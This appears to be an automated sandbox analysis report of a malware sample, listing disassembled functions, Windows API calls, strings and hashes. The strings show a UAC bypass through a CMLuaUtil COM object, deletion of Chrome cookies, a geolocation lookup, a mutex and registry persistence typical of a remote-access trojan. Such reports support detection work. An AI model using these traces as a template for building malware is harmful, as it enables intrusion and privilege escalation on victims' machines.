                                                                                Download Yara Rule
                                                                                APIs
                                                                                • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041A53E
                                                                                • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041A554
                                                                                • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041A56D
                                                                                • InternetCloseHandle.WININET(00000000), ref: 0041A5B3
                                                                                • InternetCloseHandle.WININET(00000000), ref: 0041A5B6
                                                                                Strings
                                                                                • http://geoplugin.net/json.gp, xrefs: 0041A54E
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Internet$CloseHandleOpen$FileRead
                                                                                • String ID: http://geoplugin.net/json.gp
                                                                                • API String ID: 3121278467-91888290
                                                                                • Opcode ID: 117f478e5dcb85dc531d16fba4f4d200371f733cb8c6784368eadabc1d711714
                                                                                • Instruction ID: 402fbdb1aff19a1981f8347c65821a4f206ec005c70a85ea4635686413b1fe25
                                                                                • Opcode Fuzzy Hash: 117f478e5dcb85dc531d16fba4f4d200371f733cb8c6784368eadabc1d711714
                                                                                • Instruction Fuzzy Hash: 2711C87110A3126BD214AA169C45DBF7FDCEF46365F00053EF905D2191DB689C48C6B6
                                                                                Function 0044FCDB Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0044FA22: _free.LIBCMT ref: 0044FA4B
                                                                                • _free.LIBCMT ref: 0044FD29
                                                                                  • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                                                  • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                                                • _free.LIBCMT ref: 0044FD34
                                                                                • _free.LIBCMT ref: 0044FD3F
                                                                                • _free.LIBCMT ref: 0044FD93
                                                                                • _free.LIBCMT ref: 0044FD9E
                                                                                • _free.LIBCMT ref: 0044FDA9
                                                                                • _free.LIBCMT ref: 0044FDB4
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                • String ID:
                                                                                • API String ID: 776569668-0
                                                                                • Opcode ID: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                                                • Instruction ID: b6f47af98b99390d2ca34363280ce03bc5e4d1be0f6c4f29549f69d6ae0d3a9a
                                                                                • Opcode Fuzzy Hash: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                                                • Instruction Fuzzy Hash: 5F119031711B04B6F520FBB2CC07FCBB7DC9F42308F814C2EB29E76152E628A9184645
                                                                                Function 00406815 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 59COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe), ref: 00406835
                                                                                  • Part of subcall function 00406764: _wcslen.LIBCMT ref: 00406788
                                                                                  • Part of subcall function 00406764: CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                                                                                • CoUninitialize.OLE32 ref: 0040688E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: InitializeObjectUninitialize_wcslen
                                                                                • String ID: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                                                • API String ID: 3851391207-2750610419
                                                                                • Opcode ID: cc256bbe825efe690782e207798e63cf697be23d062579cdcaa40baaa38e88a5
                                                                                • Instruction ID: 622c6236034ee416db36617ed9a374104512909f75adacabffe0517dc70a223e
                                                                                • Opcode Fuzzy Hash: cc256bbe825efe690782e207798e63cf697be23d062579cdcaa40baaa38e88a5
                                                                                • Instruction Fuzzy Hash: A501C0722013106FE2287B11DC0EF3B2658DB4176AF22413FF946A71C1EAA9AC104669
                                                                                Function 0040FED2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 0040FEDF
                                                                                • int.LIBCPMT ref: 0040FEF2
                                                                                  • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                                                                                  • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                                                                                • std::_Facet_Register.LIBCPMT ref: 0040FF2E
                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FF54
                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FF70
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                • String ID: H]G
                                                                                • API String ID: 2536120697-1717957184
                                                                                • Opcode ID: 4f42b0104d3fab8d9c54d588918312ac25f5cdf33bdc383dd9a32706d08bdfcf
                                                                                • Instruction ID: c39742161ac3258eace465d30f2780732a1ff9819e97f4bd037edafe9ec39b9f
                                                                                • Opcode Fuzzy Hash: 4f42b0104d3fab8d9c54d588918312ac25f5cdf33bdc383dd9a32706d08bdfcf
                                                                                • Instruction Fuzzy Hash: 9011BF31900419ABCB24FBA5C8468DDB7799F95318B20007FF505B72C1EB78AF09C799
                                                                                Function 00790139 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00790146
                                                                                • int.LIBCPMT ref: 00790159
                                                                                  • Part of subcall function 0078D147: std::_Lockit::_Lockit.LIBCPMT ref: 0078D158
                                                                                  • Part of subcall function 0078D147: std::_Lockit::~_Lockit.LIBCPMT ref: 0078D172
                                                                                • std::_Facet_Register.LIBCPMT ref: 00790195
                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 007901BB
                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 007901D7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                • String ID: H]G
                                                                                • API String ID: 2536120697-1717957184
                                                                                • Opcode ID: 0a2989e8c640b6c3179e3035855110f6a7cb0f7e06d84751caa425ed32edbe19
                                                                                • Instruction ID: f29d4d888c387314ccfcf8fe4378fce4c8f16e827977d65fa4d4ad994d0d9e1c
                                                                                • Opcode Fuzzy Hash: 0a2989e8c640b6c3179e3035855110f6a7cb0f7e06d84751caa425ed32edbe19
                                                                                • Instruction Fuzzy Hash: F711AC32940518EFCF19FBA4E94A9EDB778AF50714B200059F8056B192EF38AF06CBD5
                                                                                Function 007869CB Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 55COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _wcslen.LIBCMT ref: 007869EF
                                                                                • CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 00786A50
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Object_wcslen
                                                                                • String ID: $$[+] CoGetObject SUCCESS$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                                                • API String ID: 240030777-4254711192
                                                                                • Opcode ID: db32128b02a1ccbc70c4588b7822f6c775a314ba91b6364ff21a4127614396bf
                                                                                • Instruction ID: 77ad8559ec3c00aff34e7cd2e82c538570b7d1ac6177e22a49efd5656300fa10
                                                                                • Opcode Fuzzy Hash: db32128b02a1ccbc70c4588b7822f6c775a314ba91b6364ff21a4127614396bf
                                                                                • Instruction Fuzzy Hash: CF117072A10118FBDB10FAA49859BDEB7BCDB44710F50406AF905E3241FB789E148779
                                                                                Function 0040B2A8 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 48fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040B2E4
                                                                                • GetLastError.KERNEL32 ref: 0040B2EE
                                                                                Strings
                                                                                • UserProfile, xrefs: 0040B2B4
                                                                                • [Chrome Cookies found, cleared!], xrefs: 0040B314
                                                                                • [Chrome Cookies not found], xrefs: 0040B308
                                                                                • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040B2AF
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: DeleteErrorFileLast
                                                                                • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                                                • API String ID: 2018770650-304995407
                                                                                • Opcode ID: 80473ec72bc7b8e86fd4da3360fe18b30b4031f84b4b421f49e46732e938ea40
                                                                                • Instruction ID: 647c9f6895dd19beb09db90be4e639f81332b1b521455d1adc7a9c6a9ee315b4
                                                                                • Opcode Fuzzy Hash: 80473ec72bc7b8e86fd4da3360fe18b30b4031f84b4b421f49e46732e938ea40
                                                                                • Instruction Fuzzy Hash: 3301A23164410557CB047BB5DD6B8AF3624ED50708F60013FF802B32E2FE3A9A0586CE
                                                                                Function 0079CBD6 Relevance: 10.5, APIs: 7, Instructions: 47windowstringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0079CBEF
                                                                                  • Part of subcall function 0079CC86: RegisterClassExA.USER32(00000030), ref: 0079CCD3
                                                                                  • Part of subcall function 0079CC86: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0079CCEE
                                                                                  • Part of subcall function 0079CC86: GetLastError.KERNEL32 ref: 0079CCF8
                                                                                • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0079CC26
                                                                                • lstrcpyn.KERNEL32(00473B68,0046C104,00000080), ref: 0079CC40
                                                                                • Shell_NotifyIcon.SHELL32(00000000,00473B50), ref: 0079CC56
                                                                                • TranslateMessage.USER32(?), ref: 0079CC62
                                                                                • DispatchMessageA.USER32(?), ref: 0079CC6C
                                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0079CC79
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                                                • String ID:
                                                                                • API String ID: 1970332568-0
                                                                                • Opcode ID: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                                                                                • Instruction ID: ac4db3dd68450ede6088bf0ec0d40e98c622e76b14db969cef199f4ac62f63ec
                                                                                • Opcode Fuzzy Hash: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                                                                                • Instruction Fuzzy Hash: 230121B1904344ABDB109FA5FC4DEDA7BBCA745B16F004035F609E2162D7B8A245EB68
                                                                                Function 004064D0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 40COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe$Rmc-GJDISH$BG
                                                                                • API String ID: 0-756390545
                                                                                • Opcode ID: 51f1828bc25dd4c0d61216237760cedcfa3e45f86a5da5526d20c461b23c031b
                                                                                • Instruction ID: a0817f974ad937f6cb5b9dd001e5131ae01746641b95ac10126ddf8aadfa6e31
                                                                                • Opcode Fuzzy Hash: 51f1828bc25dd4c0d61216237760cedcfa3e45f86a5da5526d20c461b23c031b
                                                                                • Instruction Fuzzy Hash: 05F096B17022109BDB103774BC1967A3645A780356F01847BF94BFA6E5DB3C8851869C
                                                                                Function 00786737 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 40COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe$Rmc-GJDISH$BG
                                                                                • API String ID: 0-756390545
                                                                                • Opcode ID: d1be4aec57154437973d558091bbe471e33116169eb7d1567a4c56866b781843
                                                                                • Instruction ID: 3eb2435fa89bd804a639f8519ac93b4a36a39791380fc92f709bea40f0bddb3f
                                                                                • Opcode Fuzzy Hash: d1be4aec57154437973d558091bbe471e33116169eb7d1567a4c56866b781843
                                                                                • Instruction Fuzzy Hash: 14F090F0BD1310EBDB203B346D1DB693A4AE78079BF104476F50AD72A2EB6C8C418798
                                                                                Function 007929DB Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 38registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RegCreateKeyW.ADVAPI32(80000001,00000000,BG), ref: 007929E6
                                                                                • RegSetValueExW.ADVAPI32(BG,?,00000000,00000001,00000000,00000000,004742F8,?,0078E832,pth_unenc,004742E0), ref: 00792A14
                                                                                • RegCloseKey.ADVAPI32(?,?,0078E832,pth_unenc,004742E0), ref: 00792A1F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseCreateValue
                                                                                • String ID: 2x$pth_unenc$BG
                                                                                • API String ID: 1818849710-2424854214
                                                                                • Opcode ID: f3f4d92ea395f83514c7fc898d5ccc6e166341d4c45edfed3dd661c905dadffd
                                                                                • Instruction ID: 802e40c40ee9988dbd138711a736116b7fac1555afbad4552105581c3c5d793e
                                                                                • Opcode Fuzzy Hash: f3f4d92ea395f83514c7fc898d5ccc6e166341d4c45edfed3dd661c905dadffd
                                                                                • Instruction Fuzzy Hash: 5BF06D72580218BBDF10ABA0ED5AFEE376CEB00B81F108564F902A60A2E635DA05DB50
                                                                                Function 004432E7 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 30COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _free.LIBCMT ref: 00443305
                                                                                  • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                                                  • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                                                • _free.LIBCMT ref: 00443317
                                                                                • _free.LIBCMT ref: 0044332A
                                                                                • _free.LIBCMT ref: 0044333B
                                                                                • _free.LIBCMT ref: 0044334C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                • String ID: `=j
                                                                                • API String ID: 776569668-1880740554
                                                                                • Opcode ID: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
                                                                                • Instruction ID: 76e6a482bc9a1727a28655d1f271e5fc3ecde01143ea680422932a64b095765e
                                                                                • Opcode Fuzzy Hash: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
                                                                                • Instruction Fuzzy Hash: B9F05EF08075209FAB12AF2DBD014893BA0B786755306413BF41EB2772EB380D95DB8E
                                                                                Function 004395FC Relevance: 9.3, APIs: 6, Instructions: 284COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __allrem.LIBCMT ref: 00439789
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397A5
                                                                                • __allrem.LIBCMT ref: 004397BC
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397DA
                                                                                • __allrem.LIBCMT ref: 004397F1
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043980F
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                • String ID:
                                                                                • API String ID: 1992179935-0
                                                                                • Opcode ID: 90d3cbeaf7f932440d57ef5c22d3b8f6324572cbadffe2a0eaa56fc6fd551e6e
                                                                                • Instruction ID: 29148231e9435c1f59b8c02308e8e4f0c882d016d38a0f6ab7871d26eba04b65
                                                                                • Opcode Fuzzy Hash: 90d3cbeaf7f932440d57ef5c22d3b8f6324572cbadffe2a0eaa56fc6fd551e6e
                                                                                • Instruction Fuzzy Hash: 7A811B726017069BE724AE79CC82B6F73A8AF49328F24512FF511D66C1E7B8DD018B58
                                                                                Function 007B9863 Relevance: 9.3, APIs: 6, Instructions: 284COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __allrem.LIBCMT ref: 007B99F0
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007B9A0C
                                                                                • __allrem.LIBCMT ref: 007B9A23
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007B9A41
                                                                                • __allrem.LIBCMT ref: 007B9A58
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007B9A76
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                • String ID:
                                                                                • API String ID: 1992179935-0
                                                                                • Opcode ID: b8fade3388712e20a6f67c03e6901a2274372487572bf270bb9750812de2a36e
                                                                                • Instruction ID: 0ea07ba95e09ee3eeaf98edb88d264ce091939b66d19080f24e4f35e1f7e1f19
                                                                                • Opcode Fuzzy Hash: b8fade3388712e20a6f67c03e6901a2274372487572bf270bb9750812de2a36e
                                                                                • Instruction Fuzzy Hash: 0781FA72A00B06DBE7249E79DC46FEA73A9AF41324F24852EF721D7681E778E940C750
                                                                                Function 007C2D3F Relevance: 9.2, APIs: 6, Instructions: 217COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _free.LIBCMT ref: 007C2DCF
                                                                                • _free.LIBCMT ref: 007C2DE9
                                                                                • _free.LIBCMT ref: 007C2DF4
                                                                                • _free.LIBCMT ref: 007C2EC8
                                                                                • _free.LIBCMT ref: 007C2EE4
                                                                                  • Part of subcall function 007BAABB: IsProcessorFeaturePresent.KERNEL32(00000017,007BAA8D,?,?,00781BC9,?,?,00000000,?,?,007BAAAD,00000000,00000000,00000000,00000000,00000000), ref: 007BAABD
                                                                                  • Part of subcall function 007BAABB: GetCurrentProcess.KERNEL32(C0000417), ref: 007BAADF
                                                                                  • Part of subcall function 007BAABB: TerminateProcess.KERNEL32(00000000), ref: 007BAAE6
                                                                                • _free.LIBCMT ref: 007C2EEE
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free$Process$CurrentFeaturePresentProcessorTerminate
                                                                                • String ID:
                                                                                • API String ID: 2329545287-0
                                                                                • Opcode ID: e40ad7fbed77d86ed48c5751771db778d898a633fb700c5612ced942e7692302
                                                                                • Instruction ID: 677785769c0bacfd9de89bfb3d87c4728617e75a1edbcff8d8b2ad6c17998af3
                                                                                • Opcode Fuzzy Hash: e40ad7fbed77d86ed48c5751771db778d898a633fb700c5612ced942e7692302
                                                                                • Instruction Fuzzy Hash: 86519036604215ABDF249F78D889FBA77A9DF45710F24405DF905A7143EA3A9D43C390
                                                                                Function 007C9BB7 Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,?,?,?,?,007C9E08,00000001,00000001,00000006), ref: 007C9C11
                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,?,?,?,007C9E08,00000001,00000001,00000006), ref: 007C9C97
                                                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,00000006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 007C9D91
                                                                                • __freea.LIBCMT ref: 007C9D9E
                                                                                  • Part of subcall function 007C6D66: RtlAllocateHeap.NTDLL(00000000,007B468A,?), ref: 007C6D98
                                                                                • __freea.LIBCMT ref: 007C9DA7
                                                                                • __freea.LIBCMT ref: 007C9DCC
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                • String ID:
                                                                                • API String ID: 1414292761-0
                                                                                • Opcode ID: a4f5f7d7e0253137201d24c54ea4cf660dd43f3a14d4cde2709bba3cbd133d87
                                                                                • Instruction ID: 098f4db3ddff9ebea153288a4aee3f214d5f51ce3dda6104006b6091f1e53a82
                                                                                • Opcode Fuzzy Hash: a4f5f7d7e0253137201d24c54ea4cf660dd43f3a14d4cde2709bba3cbd133d87
                                                                                • Instruction Fuzzy Hash: 4651D072700216AFDB658F64CC89FAE7BA9EF40B50F15466DFE06E6240EB39DC50C660
                                                                                Function 00444B3D Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: __cftoe
                                                                                • String ID:
                                                                                • API String ID: 4189289331-0
                                                                                • Opcode ID: 07fcb3c060a749777e725642930ed18157a1f5019e1f3146b4d3bc33616e3b2a
                                                                                • Instruction ID: 646e0444ce84107b4b6d0ff1d92098e8eb0dfa86acef9ec08128487301265115
                                                                                • Opcode Fuzzy Hash: 07fcb3c060a749777e725642930ed18157a1f5019e1f3146b4d3bc33616e3b2a
                                                                                • Instruction Fuzzy Hash: A851FC72900105ABFB249F598C81F6F77A9EFC9324F15421FF815A6281DB3DDD01866D
                                                                                Function 007C4DA4 Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: __cftoe
                                                                                • String ID:
                                                                                • API String ID: 4189289331-0
                                                                                • Opcode ID: 69df1f9648de409375186bf4c737c9597d71512c260aa95240f454dab3e526b7
                                                                                • Instruction ID: 585e3e26d6f64f5368c96462d1a5643e5df64f89d957e55e687ce5556b051f73
                                                                                • Opcode Fuzzy Hash: 69df1f9648de409375186bf4c737c9597d71512c260aa95240f454dab3e526b7
